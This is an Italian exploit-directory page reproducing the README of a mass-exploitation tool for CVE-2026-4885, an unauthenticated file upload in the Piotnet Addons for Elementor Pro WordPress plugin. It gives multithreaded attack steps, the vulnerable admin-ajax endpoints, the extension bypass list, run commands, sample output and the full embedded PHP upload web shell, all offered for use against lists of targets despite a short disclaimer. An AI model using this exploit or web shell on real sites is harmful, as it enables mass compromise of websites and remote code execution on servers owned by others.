Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-4885 — Piotnet Addons for Elementor Pro <= 7.1.70 - Caricamento file arbitrario non autenticato tramite caricamento file del modulo | Kitploit
Strumenti/GitHubGitHub/jenderal92/cve-2026-4885
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingSviluppo Payload
GitHubjenderal92/cve-2026-4885

CVE-2026-4885

Piotnet Addons for Elementor Pro <= 7.1.70 - Caricamento file arbitrario non autenticato tramite caricamento file del modulo

Vedi Repository
43 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-4885 – Piotnet Addons for Elementor Pro Mass Exploit

Caricamento arbitrario di file non autenticato che porta a Remote Code Execution (RCE) in Piotnet Addons for Elementor Pro ≤ 7.1.70.

Questo strumento è progettato per lo sfruttamento di massa – inserisci una lista di target e provvederà automaticamente a:

  • Rilevare la versione del plugin (o presupporre che sia vulnerabile se vengono trovati gli asset)
  • Eseguire ricognizioni avanzate per estrarre post_id, form_id e il nome corretto del campo di upload
  • Provare multiple estensioni PHP (.phtml, .php3, .php4, .phps, .pht, .php2) per bypassare filtri deboli
  • Caricare una shell PHP con header GIF89a (integrata, nessun file esterno necessario)
  • Divulgare l'URL della shell caricata tramite pafe_export_database
  • Verificare l'esecuzione della shell (cerca la stringa Logic_Internet) e salvare l'URL in shells.txt
  • ⚠️ Disclaimer
    Questo strumento è destinato esclusivamente a test di sicurezza educativi e autorizzati.
    L'uso non autorizzato contro sistemi che non possiedi è illegale.

    Per ulteriori disclaimer, puoi vedere quello sulla copertina di Jenderal92. Puoi controllarlo QUI !!!


    Caratteristiche

    • Compatibile con Python 2.7 (funziona anche con Python 3 se adatti print/input)
    • Multi-thread – scansiona e sfrutta fino a 20 target contemporaneamente
    • Rilevamento intelligente dei form – analizza gli attributi HTML specifici di Piotnet (data-pafe-form-builder-field-name, data-elementor-id, ecc.)
    • Nessun file shell esterno – il payload PHP è integrato nello script
    • Schema URL automatico – aggiunge https:// se mancante
    • Elenco esteso di percorsi – include 22 URL di form comuni (/contact, /apply, /quote, /book-appointment, …)
    • Pattern di divulgazione – corrisponde sia a wp-content/uploads/piotnet-addons-for-elementor/ sia a percorsi root diretti

    Requisiti

    • Python 2.7 (o Python 3 con modifiche minori)
    • Libreria requests
    root@kitploit:~
    pip install requests
    

    Installazione

    root@kitploit:~
    git clone https://github.com/Jenderal92/CVE-2026-4885.git
    cd CVE-2026-4885
    

    Utilizzo

    1. Prepara un file di target

    Crea un file chiamato targets.txt (o qualsiasi altro nome) con un URL per riga:

    root@kitploit:~
    https://example1.com
    example2.com
    http://vulnerable-site.org
    
    1. Esegui lo exploit
    root@kitploit:~
    python2 CVE-2026-4885.py targets.txt
    

    Lo script:

    · Mostra l'avanzamento per ogni target · Salva gli URL delle shell riuscite in shells.txt

    Esempio di output

    root@kitploit:~
    [*] Loaded built-in shell (598 bytes)
    [*] scanning 25 pages...
    [+] found form at https://target.com/contact | post_id=13 form_id=fa2c60e field=file
    [*] post_id=13 form_id=fa2c60e field=file
    [*] trying .phtml
    [+] uploaded .phtml
    [+] shell URL: https://target.com/wp-content/uploads/piotnet-addons-for-elementor/xxx-6a11e162a6099.phtml
    [+] SHELL UPLOADED -> https://target.com/wp-content/uploads/piotnet-addons-for-elementor/xxx-6a11e162a6099.phtml
    

    Opzioni da riga di comando (personalizzabili nello script)

    Variabile Descrizione Default TIMEOUT Timeout delle richieste HTTP 10 secondi MAX_THREADS Numero di thread concorrenti 20 OUTPUT_FILE Dove salvare gli URL delle shell riuscite shells.txt EXT_LIST Estensioni file da provare .phtml, .php3, .php4, .phps, .pht, .php2

    Puoi modificarle modificando l'inizio dello script.


    Payload della Shell

    La shell integrata è:

    root@kitploit:~
    GIF89a;
    <?php
    echo 'Logic_Internet'.'<br>'.'Uname:'.php_uname().'<br>'.$cwd = getcwd();
    Echo '<center>  <form method="post" target="_self" enctype="multipart/form-data">  <input type="file" size="20" name="uploads" /> <input type="submit" value="upload" />  </form>  </center>'.'<br>';
    if (!empty ($_FILES['uploads'])) {
        move_uploaded_file($_FILES['uploads']['tmp_name'],$_FILES['uploads']['name']);
        Echo "<script>alert('upload Done');</script><b>Uploaded !!!</b><br>name : ".$_FILES['uploads']['name']."<br>size : ".$_FILES['uploads']['size']."<br>type : ".$_FILES['uploads']['type'];
    }
    ?>
    

    · Mostra le informazioni sul server, la directory di lavoro corrente e un form di upload file. · Può essere sostituita con qualsiasi altro codice PHP (basta cambiare SHELL_CODE nello script).


    Come Funziona

    1. Rilevamento della versione · Cerca ?ver= negli asset del plugin nella homepage. · Come ripiego, verifica l'esistenza di file CSS/JS noti.
    2. Ricognizione · Analizza le pagine di form comuni e tutti i collegamenti interni trovati nella homepage. · Estrae post_id, form_id e il nome corretto del campo di upload dagli attributi HTML specifici di Piotnet.
    3. Upload · Invia una richiesta POST multipart a wp-admin/admin-ajax.php?action=pafe_ajax_form_builder. · Utilizza un payload JSON che imita il meccanismo di upload del plugin. · Prova tutte le estensioni in EXT_LIST finché una non riesce.
    4. Divulgazione · Richiede pafe_export_database che restituisce un CSV contenente l'URL completo del file caricato. · Analizza l'URL usando un pattern regex che corrisponde a xxx-{random}.ext.
    5. Verifica · Visita l'URL divulgato. · Controlla la presenza della stringa Logic_Internet. · Salva l'URL in shells.txt in caso di successo.

    Risoluzione dei problemi

    UnicodeEncodeError su Windows

    Lo script include già una funzione safe_unicode() che gestisce i caratteri non ASCII. Se vedi ancora errori, assicurati che il tuo terminale supporti UTF-8:

    root@kitploit:~
    chcp 65001
    

    Nessun form trovato / Tutte le estensioni falliscono

    · Il target potrebbe essere stato patchato o non utilizzare Piotnet Addons. · Prova ad aumentare TIMEOUT o MAX_THREADS. · Verifica manualmente che il plugin sia effettivamente installato.

    La divulgazione fallisce ma l'upload riesce

    · L'endpoint pafe_export_database potrebbe essere disabilitato o protetto. · Prova ad accedere manualmente a /wp-admin/admin-ajax.php?action=pafe_export_database in un browser per vedere se è accessibile.


    Uso Legale ed Etico

    · Usa questo strumento solo su sistemi per cui hai il permesso scritto di testare. · L'autore non è responsabile di qualsiasi uso improprio o danno causato. · Rispetta tutte le leggi applicabili.

    Scarica lo strumento